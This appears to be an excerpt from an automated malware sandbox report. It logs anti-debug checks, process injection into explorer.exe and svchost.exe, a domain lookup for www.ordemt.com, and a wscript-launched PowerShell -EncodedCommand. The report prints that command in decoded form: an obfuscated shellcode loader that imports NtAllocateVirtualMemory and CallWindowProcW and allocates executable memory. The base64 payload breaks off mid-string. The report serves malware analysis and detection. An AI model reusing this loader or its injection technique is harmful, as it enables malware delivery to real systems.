      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03229080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032A3884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032A3884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032258EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032BB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032BB8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032BB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032BB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032BB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032BB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03224F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03224F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0325E730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032F070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032F070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0325A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0325A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0324F716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032BFF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032BFF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0323FF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032F8F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0323EF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03238794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032A7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032A7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032A7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032637F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0322E620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032DFE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0322C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0322C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0322C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03258E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032E1608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0325A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0325A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0323766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0324AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0324AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0324AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0324AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0324AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03237E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03237E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03237E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03237E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03237E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03237E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032EAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032EAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032F0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032F0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032F0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032A46A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032BFE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032376E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032516E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03268EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032536CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032DFEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032F8ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0322AD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03233D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032EE539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032F8D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032AA537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03254D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03254D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03254D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0324C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0324C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03263D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032A3540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03247D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032F05AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032F05AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032535A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03251DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03251DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03251DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03252581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03252581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03252581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03252581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03222D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03222D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03222D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03222D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03222D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0325FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0325FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0323D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0323D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032EFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032EFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032EFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032EFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA296E0 NtFreeVirtualMemory,LdrInitializeThunk,

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\explorer.exeDomain query: www.ordemt.com
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: 8F0000
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #LACTIFERO brego Knobetsfri9 Hest3 Gruesom4 Generalis AFMEJ beaver BIBLIOGR Ddmandskn5 nullin lnpotsyste Threapedaf Outwres GTEVIV Unshackli8 corre LARMENSF Distingv8 disembo HYPE Unfil9 VANDBRNDA Genne Bemestre4 indpa Bitsyle Ternashe Kokard Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class brnecykl1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int brnecykl6,ref Int32 restbelb,int Dybb6,ref Int32 brnecykl,int applie,int brnecykl7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string imman,uint Hypogynyb,int Discipl3,int brnecykl0,int Petuniern,int Grungesmit,int Demoral5);[DllImport("kernel32.dll")]public static extern int ReadFile(int Dybb60,uint Dybb61,IntPtr Dybb62,ref Int32 Dybb63,int Dybb64);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Dybb65,int Dybb66,int Dybb67,int Dybb68,int Dybb69);}"@#Bisamschu Doven8 Caly Kuldioxid grafikruti Lkkern Kanoni9 Chel9 endeballen disk Tadeawouc4 Uitotanud8 Cutlassf4 Rhip8 Tendereeo reinhold Hjemviselu9 HURRS Omni6 Biggis5 Ohmav4 Buch Peggypara nvningedo FOELGESED Test-Path "soum" Test-Path "EXCLUD" $brnecykl3=0;$brnecykl9=1048576;$brnecykl8=[brnecykl1]::NtAllocateVirtualMemory(-1,[ref]$brnecykl3,0,[ref]$brnecykl9,12288,64)#SUPER STOCKILYR Stnkela5 emprost definitt Sepiabru1 topografer DRYPSTEN Frekv6 Delibe6 Matias3 husningkv Husm CHEESEFL vaag Thel Super5 sacrist
      Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #LACTIFERO brego Knobetsfri9 Hest3 Gruesom4 Generalis AFMEJ beaver BIBLIOGR Ddmandskn5 nullin lnpotsyste Threapedaf Outwres GTEVIV Unshackli8 corre LARMENSF Distingv8 disembo HYPE Unfil9 VANDBRNDA Genne Bemestre4 indpa Bitsyle Ternashe Kokard Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class brnecykl1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int brnecykl6,ref Int32 restbelb,int Dybb6,ref Int32 brnecykl,int applie,int brnecykl7);[DllImport("kernel32.dll")]public static extern IntPtr CreateFileA(string imman,uint Hypogynyb,int Discipl3,int brnecykl0,int Petuniern,int Grungesmit,int Demoral5);[DllImport("kernel32.dll")]public static extern int ReadFile(int Dybb60,uint Dybb61,IntPtr Dybb62,ref Int32 Dybb63,int Dybb64);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(IntPtr Dybb65,int Dybb66,int Dybb67,int Dybb68,int Dybb69);}"@#Bisamschu Doven8 Caly Kuldioxid grafikruti Lkkern Kanoni9 Chel9 endeballen disk Tadeawouc4 Uitotanud8 Cutlassf4 Rhip8 Tendereeo reinhold Hjemviselu9 HURRS Omni6 Biggis5 Ohmav4 Buch Peggypara nvningedo FOELGESED Test-Path "soum" Test-Path "EXCLUD" $brnecykl3=0;$brnecykl9=1048576;$brnecykl8=[brnecykl1]::NtAllocateVirtualMemory(-1,[ref]$brnecykl3,0,[ref]$brnecykl9,12288,64)#SUPER STOCKILYR Stnkela5 emprost definitt Sepiabru1 topografer DRYPSTEN Frekv6 Delibe6 Matias3 husningkv Husm CHEESEFL vaag Thel Super5 sacrist
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeThread APC queued: target process: C:\Windows\explorer.exe
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeThread register set: target process: 3424
      Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 3424
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBMAEEAQwBUAEkARgBFAFIATwAgAGIAcgBlAGcAbwAgAEsAbgBvAGIAZQB0AHMAZgByAGkAOQAgAEgAZQBzAHQAMwAgAEcAcgB1AGUAcwBvAG0ANAAgAEcAZQBuAGUAcgBhAGwAaQBzACAAQQBGAE0ARQBKACAAYgBlAGEAdgBlAHIAIABCAEkAQgBMAEkATwBHAFIAIABEAGQAbQBhAG4AZABzAGsAbgA1ACAAbgB1AGwAbABpAG4AIABsAG4AcABvAHQAcwB5AHMAdABlACAAVABoAHIAZQBhAHAAZQBkAGEAZgAgAE8AdQB0AHcAcgBlAHMAIABHAFQARQBWAEkAVgAgAFUAbgBzAGgAYQBjAGsAbABpADgAIABjAG8AcgByAGUAIABMAEEAUgBNAEUATgBTAEYAIABEAGkAcwB0AGkAbgBnAHYAOAAgAGQAaQBzAGUAbQBiAG8AIABIAFkAUABFACAAVQBuAGYAaQBsADkAIABWAEEATgBEAEIAUgBOAEQAQQAgAEcAZQBuAG4AZQAgAEIAZQBtAGUAcwB0AHIAZQA0ACAAaQBuAGQAcABhACAAQgBpAHQAcwB5AGwAZQAgAFQAZQByAG4AYQBzAGgAZQAgAEsAbwBrAGEAcgBkACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAHIAbgBlAGMAeQBrAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIAByAGUAcwB0AGIAZQBsAGIALABpAG4AdAAgAEQAeQBiAGIANgAsAHIAZQBmACAASQBuAHQAMwAyACAAYgByAG4AZQBjAHkAawBsACwAaQBuAHQAIABhAHAAcABsAGkAZQAsAGkAbgB0ACAAYgByAG4AZQBjAHkAawBsADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoAHMAdAByAGkAbgBnACAAaQBtAG0AYQBuACwAdQBpAG4AdAAgAEgAeQBwAG8AZwB5AG4AeQBiACwAaQBuAHQAIABEAGkAcwBjAGkAcABsADMALABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAAwACwAaQBuAHQAIABQAGUAdAB1AG4AaQBlAHIAbgAsAGkAbgB0ACAARwByAHUAbgBnAGUAcwBtAGkAdAAsAGkAbgB0ACAARABlAG0AbwByAGEAbAA1ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEQAeQBiAGIANgAwACwAdQBpAG4AdAAgAEQAeQBiAGIANgAxACwASQBuAHQAUAB0AHIAIABEAHkAYgBiADYAMgAsAHIAZQBmACAASQBuAHQAMwAyACAARAB5AGIAYgA2ADMALABpAG4AdAAgAEQAeQBiAGIANgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABEAHkAYgBiADYANQAsAGkAbgB0ACAARAB5AGIAYgA2ADYALABpAG4AdAAgAEQAeQBiAGIANgA3ACwAaQBuAHQAIABEAHkAYgBiADYAOAAsAGkAbgB0ACAARAB5AGIAYgA2ADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAQgBpAHMAYQBtAHMAYwBoAHUAIABEAG8AdgBlAG4AOAAgAEMAYQBsAHkAIABLAHUAbABkAGkAbwB4AGkAZAAgAGcAcgBhAGYAaQBrAHIAdQB0AGkAIABMAGsAawBlAHIAbgAgAEsAYQBuAG8AbgBpADkAIABDAGgAZQBsADkAIABlAG4AZABlAGIAYQBsAGwAZQBuACAAZABpAHMAawAgAFQAYQBkAGUAYQB3AG8AdQBjADQAIABVAGkAdABvAHQAYQBuAHUAZAA4ACAAQwB1AHQAbABhAHMAcwBmADQAI
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBMAEEAQwBUAEkARgBFAFIATwAgAGIAcgBlAGcAbwAgAEsAbgBvAGIAZQB0AHMAZgByAGkAOQAgAEgAZQBzAHQAMwAgAEcAcgB1AGUAcwBvAG0ANAAgAEcAZQBuAGUAcgBhAGwAaQBzACAAQQBGAE0ARQBKACAAYgBlAGEAdgBlAHIAIABCAEkAQgBMAEkATwBHAFIAIABEAGQAbQBhAG4AZABzAGsAbgA1ACAAbgB1AGwAbABpAG4AIABsAG4AcABvAHQAcwB5AHMAdABlACAAVABoAHIAZQBhAHAAZQBkAGEAZgAgAE8AdQB0AHcAcgBlAHMAIABHAFQARQBWAEkAVgAgAFUAbgBzAGgAYQBjAGsAbABpADgAIABjAG8AcgByAGUAIABMAEEAUgBNAEUATgBTAEYAIABEAGkAcwB0AGkAbgBnAHYAOAAgAGQAaQBzAGUAbQBiAG8AIABIAFkAUABFACAAVQBuAGYAaQBsADkAIABWAEEATgBEAEIAUgBOAEQAQQAgAEcAZQBuAG4AZQAgAEIAZQBtAGUAcwB0AHIAZQA0ACAAaQBuAGQAcABhACAAQgBpAHQAcwB5AGwAZQAgAFQAZQByAG4AYQBzAGgAZQAgAEsAbwBrAGEAcgBkACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAHIAbgBlAGMAeQBrAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIAByAGUAcwB0AGIAZQBsAGIALABpAG4AdAAgAEQAeQBiAGIANgAsAHIAZQBmACAASQBuAHQAMwAyACAAYgByAG4AZQBjAHkAawBsACwAaQBuAHQAIABhAHAAcABsAGkAZQAsAGkAbgB0ACAAYgByAG4AZQBjAHkAawBsADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoAHMAdAByAGkAbgBnACAAaQBtAG0AYQBuACwAdQBpAG4AdAAgAEgAeQBwAG8AZwB5AG4AeQBiACwAaQBuAHQAIABEAGkAcwBjAGkAcABsADMALABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAAwACwAaQBuAHQAIABQAGUAdAB1AG4AaQBlAHIAbgAsAGkAbgB0ACAARwByAHUAbgBnAGUAcwBtAGkAdAAsAGkAbgB0ACAARABlAG0AbwByAGEAbAA1ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEQAeQBiAGIANgAwACwAdQBpAG4AdAAgAEQAeQBiAGIANgAxACwASQBuAHQAUAB0AHIAIABEAHkAYgBiADYAMgAsAHIAZQBmACAASQBuAHQAMwAyACAARAB5AGIAYgA2ADMALABpAG4AdAAgAEQAeQBiAGIANgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABEAHkAYgBiADYANQAsAGkAbgB0ACAARAB5AGIAYgA2ADYALABpAG4AdAAgAEQAeQBiAGIANgA3ACwAaQBuAHQAIABEAHkAYgBiADYAOAAsAGkAbgB0ACAARAB5AGIAYgA2ADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAQgBpAHMAYQBtAHMAYwBoAHUAIABEAG8AdgBlAG4AOAAgAEMAYQBsAHkAIABLAHUAbABkAGkAbwB4AGkAZAAgAGcAcgBhAGYAaQBrAHIAdQB0AGkAIABMAGsAawBlAHIAbgAgAEsAYQBuAG8AbgBpADkAIABDAGgAZQBsADkAIABlAG4AZABlAGIAYQBsAGwAZQBuACAAZABpAHMAawAgAFQAYQBkAGUAYQB3AG8AdQBjADQAIABVAGkAdABvAHQAYQBuAHUAZAA4ACAAQwB1AHQAbABhAHMAcwBmADQAI
